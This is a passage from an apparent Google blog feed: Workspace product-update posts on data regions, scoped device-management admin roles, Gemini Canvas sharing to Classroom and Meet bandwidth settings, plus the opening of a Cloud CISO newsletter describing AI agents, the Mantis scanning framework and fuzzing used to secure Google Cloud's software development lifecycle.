Release domains:&lt;/a&gt; Available now&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Enterprise:&lt;/b&gt; Enterprise Plus (provides in-region processing and storage capabilities)&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education: &lt;/b&gt;Education Plus and Education Standard (provides in-region storage capabilities only)&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Editions:&lt;/b&gt; Frontline Plus (provides in-region processing and storage capabilities)&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/7630496?hl=en&amp;amp;ref_topic=7631290&amp;amp;sjid=15537236112090055856-NA" target="_blank"&gt;Data regions: Choose a geographic location for your data&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/9223653" target="_blank"&gt;What data is covered by a data region policy?&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/13880647" target="_blank"&gt;About Assured Controls and Assured Controls Plus&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/gemini-app-data-regions-support.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-29T19:58:12+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/assign-mobile-device-management-admin-privileges-based-on-organizational-unit.html</id>
    <title>Assign mobile device management admin privileges based on organizational unit</title>
    <updated>2026-06-29T19:40:12+00:00</updated>
    <content type="html">We’re giving admins more granular control over how mobile device management privileges are delegated. Specifically, admins can be assigned privileges for specific organizational units (OUs), adding another layer of security by scoping access only to necessary OUs.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Previously available in beta, we’re now making this feature generally available, with improvements to the way devices are displayed to help admins view and manage their devices more efficiently.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh28m10sH-ewzhzFQ_ch_2wqOHGiG5sqvk4JbjCr8DaNAvCDOO1qqBqTMTTls_r_BdekKtz3WM3_hlufYye23JAwJgqImM_uV0uSyb50qEWHyBYzikHKgVIm38L9erdlQXQS8U1TbpSxXvfr8y9BXw_6iZ8GLRNaGjHbUu-8_2cKjima2OoaXKtAiiMvrc/s960/Assign%20mobile%20device%20management%20admin%20privileges%20based%20on%20organizational%20unit%20-%206818%20-%201.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh28m10sH-ewzhzFQ_ch_2wqOHGiG5sqvk4JbjCr8DaNAvCDOO1qqBqTMTTls_r_BdekKtz3WM3_hlufYye23JAwJgqImM_uV0uSyb50qEWHyBYzikHKgVIm38L9erdlQXQS8U1TbpSxXvfr8y9BXw_6iZ8GLRNaGjHbUu-8_2cKjima2OoaXKtAiiMvrc/s16000/Assign%20mobile%20device%20management%20admin%20privileges%20based%20on%20organizational%20unit%20-%206818%20-%201.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvVuERPQlJ9OBva_YJc3m8MvIaYHfM7yhofwhV_k1m0WV2wsL1QFF1YEnl0PnVFyV0H9VPqMLwd8Ly4hQoe7J209BYEE8VG-dNZ17fXFiZr3tX4MMe4Y4O-pAoIOk6gzPwxb2eyMwuj73LTte8u8iNhCkROMQFUgWN0NHeEUVUw-juxL_sZEoRtDpSa4w/s960/Assign%20mobile%20device%20management%20admin%20privileges%20based%20on%20organizational%20unit%20-%206818%20-%202.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvVuERPQlJ9OBva_YJc3m8MvIaYHfM7yhofwhV_k1m0WV2wsL1QFF1YEnl0PnVFyV0H9VPqMLwd8Ly4hQoe7J209BYEE8VG-dNZ17fXFiZr3tX4MMe4Y4O-pAoIOk6gzPwxb2eyMwuj73LTte8u8iNhCkROMQFUgWN0NHeEUVUw-juxL_sZEoRtDpSa4w/s16000/Assign%20mobile%20device%20management%20admin%20privileges%20based%20on%20organizational%20unit%20-%206818%20-%202.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYek4bVpvoiFi_-S_82VPGTERq_o71OISjVSZH-7-dwFBCHfkQweP1llqHAjeN2aSs7UVSf9lmluGu7ksGgPu8DEm2o_hQAPwyr78GG4GDX0_0n5LwXvknQdfIoFexChlFd8KjYbEUyKoEV0duMFAy2o7Jrh9DxxG89TM8QCVNnzyMay0pMRxCTmo7hbo/s960/Assign%20mobile%20device%20management%20admin%20privileges%20based%20on%20organizational%20unit%20-%206818%20-%203.gif" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYek4bVpvoiFi_-S_82VPGTERq_o71OISjVSZH-7-dwFBCHfkQweP1llqHAjeN2aSs7UVSf9lmluGu7ksGgPu8DEm2o_hQAPwyr78GG4GDX0_0n5LwXvknQdfIoFexChlFd8KjYbEUyKoEV0duMFAy2o7Jrh9DxxG89TM8QCVNnzyMay0pMRxCTmo7hbo/s16000/Assign%20mobile%20device%20management%20admin%20privileges%20based%20on%20organizational%20unit%20-%206818%20-%203.gif" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Example experience for an admin with OU-level permissions&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; Visit the Help Center to learn more about &lt;a href="https://support.google.com/a/answer/6129577?hl=en&amp;amp;ref_topic=9832445&amp;amp;sjid=17865051418960327865-NA" target="_blank"&gt;administrator roles&lt;/a&gt; and &lt;a href="https://knowledge.workspace.google.com/admin/devices/delegate-device-management-administrator-privileges" target="_blank"&gt;delegating device management administrator privileges&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; There is no end user impact or action required.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Full rollout (1–3 days for feature visibility)  starting on June 29, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/6129577" target="_blank"&gt;Create an admin role for an organizational unit&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/devices/delegate-device-management-administrator-privileges" target="_blank"&gt;Delegate device management administrator privileges&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/assign-mobile-device-management-admin-privileges-based-on-organizational-unit.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-29T19:40:12+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/educators-and-students-can-now-share-Gemini-Canvas-creations-directly-to-Google-Classroom.html</id>
    <title>Educators and students can now share Gemini Canvas creations directly to Google Classroom</title>
    <updated>2026-06-29T18:17:11+00:00</updated>
    <content type="html">&lt;p&gt;Educators and students of all ages can now seamlessly attach Gemini Canvas artifacts, like websites, quizzes, interactive games, infographics, and more, to Google Classroom assignments and posts. Right from Gemini Canvas, users can click on the “Share to to Classroom” button. This update allows users to enrich their classroom communication and coursework by embedding interactive materials directly into their existing workflows.&lt;/p&gt;&lt;p&gt;By removing the friction of exporting or linking external files, this feature helps teachers diversify their lesson materials and enables students to share creative outputs more efficiently. The integration ensures that rich, interactive media is easily accessible to everyone in the class, supporting a more engaging and dynamic digital learning environment.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKRMOyE9HCB_KsHRTFVCU1UN8Fz5K_UyEZHp9zbxzPmoNNUJ7NsWTnrc-96qMqt7L32JiDVKPyB-WXvYhQ_Kp9TYNQuIClbeWAQqhwomMdDkv7hcBW-_iwjb5aYSez4a4q8ARl24XM24K8omJ5_qsQXDvUhqdmolfWgCNbU1nzpm6MptmeBRNbsW74ucY/s1412/Educators%20and%20students%20can%20now%20share%20Gemini%20Canvas%20creations%20directly%20to%20Google%20Classroom.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKRMOyE9HCB_KsHRTFVCU1UN8Fz5K_UyEZHp9zbxzPmoNNUJ7NsWTnrc-96qMqt7L32JiDVKPyB-WXvYhQ_Kp9TYNQuIClbeWAQqhwomMdDkv7hcBW-_iwjb5aYSez4a4q8ARl24XM24K8omJ5_qsQXDvUhqdmolfWgCNbU1nzpm6MptmeBRNbsW74ucY/s16000/Educators%20and%20students%20can%20now%20share%20Gemini%20Canvas%20creations%20directly%20to%20Google%20Classroom.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;The ability to share Gemini Canvas artifacts will be ON by default and can be managed via a &lt;a href="https://knowledge.workspace.google.com/admin/generative-ai/gemini-app/turn-conversation-sharing-on-or-off" target="_blank"&gt;new Admin console setting&lt;/a&gt;. Additionally, sharing is governed by your organization’s existing Drive sharing policies. If Drive content is set to be shareable outside the organization, your Gemini assets will be as well. Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/admin/gemini/turn-conversation-sharing-on-or-off" target="_blank"&gt;learn more&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;To share Gemini Canvas artifacts to Google Classroom, students and educators must also be in a group or OU with &lt;a href="https://support.google.com/a/answer/14571493" target="_blank"&gt;Gemini&lt;/a&gt; set to On. Visit the Help Center to learn more about &lt;a href="https://knowledge.workspace.google.com/admin/gemini/turn-the-gemini-app-on-or-off" target="_blank"&gt;turning Gemini on or off for users&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; There is no end user setting for this feature. If enabled by your admin, you can share your Gemini canvases and media to Classroom, select Share &amp;gt; Share to Classroom &amp;gt; select the class and/or assignment you want to share it with. Visit the Help Center to &lt;a href="https://support.google.com/gemini/?hl=en#topic=15280100" target="_blank"&gt;learn more about Gemini&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt;&amp;nbsp;Available now&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Education: &lt;/b&gt;Education Fundamentals, Standard, and Plus&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Updates Blog: &lt;a href="https://workspaceupdates.googleblog.com/2026/04/share-chats-canvases-and-generated-media-from-the-Gemini-app-securely-via-Google-Drive.html" target="_blank"&gt;Share chats, canvases, and generated media from the Gemini app securely via Google Drive&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/gemini/turn-conversation-sharing-on-or-off" target="_blank"&gt;Turn conversation sharing on or off&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/gemini/turn-the-gemini-app-on-or-off" target="_blank"&gt;Turn the Gemini app on or off&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/educators-and-students-can-now-share-Gemini-Canvas-creations-directly-to-Google-Classroom.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-29T18:17:11+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/products/gemini-app/personal-intelligence-nano-banana-us-expansion</id>
    <title>The Gemini app is bringing personalized image creation to more users.</title>
    <updated>2026-06-29T17:30:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/No-cost_personalized_image_crea.max-600x600.format-webp.webp" /&gt;Personal Intelligence makes the Gemini app feel tailored to you. With your permission, it pulls from Google tools like Gmail, Google Photos, YouTube and Search to provid…</content>
    <link href="https://blog.google/innovation-and-ai/products/gemini-app/personal-intelligence-nano-banana-us-expansion" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-29T17:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/updated-admin-setting-for-improved-video-quality-in-Google-Meet.html</id>
    <title>Updated admin setting for improved video quality in Google Meet</title>
    <updated>2026-06-29T17:05:55+00:00</updated>
    <content type="html">&lt;p&gt;In April 2026, we updated Meet to &lt;a href="https://workspaceupdates.googleblog.com/2026/04/improved-video-quality-on-high-resolution-displays-in-Google-Meet.html" target="_blank"&gt;improve video quality on high-resolution displays&lt;/a&gt;. We’re now updating the way the Admin console setting that limits video bandwidth works to reduce data usage and improve call quality.&lt;/p&gt;&lt;p&gt;Previously, the ‘Limit video bandwidth’ setting only limited video bandwidth on the uplink; it now limits bandwidth on the downlink as well. In addition, we’re improving quality for two-person calls by increasing the uplink bandwidth usage in this scenario.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKUn4UKHD_HjxSViNQz3Tc632bVi6wUqkyfhdn4B3bDWIPG_kfXMKsiFcxxRPMk4-ujRk6sA4B99dQXqqraGiaQEfd3XTlzoF2E78lWEwl0gFomYcTG8qfYLL40Xv8MuAC39u8TOqFTJMBq1ZGzzJ1AdGH5I6I-BetwcqcTGOCHlPaxALbq0dKTKajr7Y/s2048/Updated%20admin%20setting%20for%20improved%20video%20quality%20in%20Google%20Meet%20-%206798%20-%201.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKUn4UKHD_HjxSViNQz3Tc632bVi6wUqkyfhdn4B3bDWIPG_kfXMKsiFcxxRPMk4-ujRk6sA4B99dQXqqraGiaQEfd3XTlzoF2E78lWEwl0gFomYcTG8qfYLL40Xv8MuAC39u8TOqFTJMBq1ZGzzJ1AdGH5I6I-BetwcqcTGOCHlPaxALbq0dKTKajr7Y/s16000/Updated%20admin%20setting%20for%20improved%20video%20quality%20in%20Google%20Meet%20-%206798%20-%201.png" style="border: 1px solid rgb(0, 0, 0);" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Updated setting for Meet default video quality&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; Your existing settings will remain applied.&amp;nbsp; Visit the Help Center to learn more about &lt;a href="https://knowledge.workspace.google.com/admin/meet/prepare-your-network-for-meet-meetings-and-live-streams#defaultquality" target="_blank"&gt;configuring default video quality&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; There is no end user setting for this feature.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Extended rollout (potentially longer than 15 days for feature visibility) starting on June 29, 2026&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Admin Help: &lt;a href="https://support.google.com/a/answer/7304109" target="_blank"&gt;Manage Meet settings (for admins)&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/meet/prepare-your-network-for-meet-meetings-and-live-streams#defaultquality" target="_blank"&gt;Configuring default video quality&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/updated-admin-setting-for-improved-video-quality-in-Google-Meet.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-29T17:05:55+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-how-google-cloud-security-uses-ai-internally</id>
    <title>Cloud CISO Perspectives: How Google Cloud Security uses AI internally</title>
    <updated>2026-06-29T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph"&gt;&lt;p&gt;Welcome to the second Cloud CISO Perspectives for June 2026. Today, we’re discussing how we use AI to chart a path to autonomous software development lifecycle security.&lt;/p&gt;&lt;p&gt;As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the &lt;a href="https://cloud.google.com/blog/products/identity-security/"&gt;Google Cloud blog&lt;/a&gt;. If you’re reading this on the website and you’d like to receive the email version, you can &lt;a href="https://cloud.google.com/resources/google-cloud-ciso-newsletter-signup"&gt;subscribe here&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-aside"&gt;&lt;dl&gt;
    &lt;dt&gt;aside_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;title&amp;#x27;, &amp;#x27;Get vital board insights with Google Cloud&amp;#x27;), (&amp;#x27;body&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fed0c4547f0&amp;gt;), (&amp;#x27;btn_text&amp;#x27;, &amp;#x27;Visit the hub&amp;#x27;), (&amp;#x27;href&amp;#x27;, &amp;#x27;https://cloud.google.com/solutions/security/board-of-directors?utm_source=cgc-site&amp;amp;utm_medium=et&amp;amp;utm_campaign=FY26-Q2-GLOBAL-GCP39634-email-dl-dgcsm-CISOP-NL-177159&amp;amp;utm_content=-&amp;amp;utm_term=-&amp;#x27;), (&amp;#x27;image&amp;#x27;, &amp;lt;GAEImage: GCAT-replacement-logo-A&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;h3&gt;&lt;b&gt;Cloud CISO Perspectives: Our path to autonomous SDLC security&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;By Chris Betz, CISO, and Ruchi Shah, senior director, Security Engineering, Google Cloud&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="Chris Betz" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Chris_Betz.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Chris Betz, CISO, Google Cloud&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  





      &lt;p&gt;AI has upended the economics of exploiting vulnerabilities, effectively erasing the traditional patching window. To survive this new reality, security requires an autonomous defense.&lt;/p&gt;&lt;p&gt;To counter machine-speed, AI-driven threats, we’ve worked hard to transition Google Cloud’s security posture to an autonomous, proactive model. By embedding specialized AI agents directly into our software development lifecycle (SDLC), we’ve created automated guardrails that protect code at a scale and speed unreachable by human teams — and we’re taking steps to make those same guardrails widely available.&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="Ruchi Shah" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Ruchi_Shah.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Ruchi Shah, senior director, Security Engineering, Google Cloud&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  





      &lt;p&gt;&lt;b&gt;How we designed agentic, secure SDLC architecture&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Google Cloud deploys modular, interconnected AI agents across every stage of the software lifecycle to continuously harden products from code ingestion to production.&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p&gt;&lt;b&gt;1. Design, review, and gate&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Historically, launch intakes and threat modeling were manual bottlenecks. Today, Google Cloud engineering teams route product launches through an agent-based security review pipeline.&lt;/p&gt;&lt;p&gt;Agents cross-reference designs against a continuous control catalog of more than 200 rigorous security requirements. High-risk indicators are automatically triaged and flagged for human engineering intervention, while a dynamic product dossier updates in real-time to replace static threat models.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="AgenticSecureSDLC_Flow_HeroBanner_R2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/AgenticSecureSDLC_Flow_HeroBanner_R2.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Google Cloud has embedded agentic capabilities across the entire SDLC flow to continuously harden products end-to-end.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Centralized AI code scanning and the Mantis framework&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Naive, decentralized AI code scanning suffers from sloppiness, frequently hallucinating bugs and yielding true-positive rates under 7%. To solve this, we built Mantis, our core multi-agent orchestration framework designed specifically for scalable, context-aware repository analysis. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The core skills at the heart of Mantis are &lt;/span&gt;&lt;a href="https://github.com/google/mantis" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;now open source&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to demonstrate the fundamental concept. We have a more full-fledged version &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-the-4-lessons-that-guided-ai-threat-defense"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;running internally&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and securing our customers.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Mantis eliminates brute-force code ingestion by constructing a hierarchical security summary tree. By condensing individual files into directory and root-level summaries, Mantis reduces token overhead by over 85% while preserving critical structural context across massive repositories.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The architecture relies on a highly-coordinated workflow across new agents and existing technologies:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Strategist agent&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Evaluates the high-level code structure, threat models, and dependency graphs to isolate risky architectural patterns, establishing a prioritized global plan of targeted investigation tasks.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Research agents&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Acting as specialized domain investigators, these agents use internal code searches to drill into raw source files, examining data tracking, control flows, and sanitization logic.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Deduplicator, reviewer, and critic agents&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Sanitize findings to filter out noise and eliminate false positives.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Reproduction sandbox&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Automatically runs AI-generated proof-of-concept exploits in an isolated, emulated environment to verify real-world exploitability before alerting developers.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;3. Self-healing fuzz testing&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While code scanning provides breadth, dynamic fuzz testing uncovers deep runtime vulnerabilities. However, writing and maintaining fuzz harnesses are often a significant engineering bottleneck.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-pull_quote"&gt;&lt;div class="uni-pull-quote h-c-page"&gt;
  &lt;section class="h-c-grid"&gt;
    &lt;div class="uni-pull-quote__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;
      &lt;div class="uni-pull-quote__inner-wrapper h-c-copy h-c-copy"&gt;
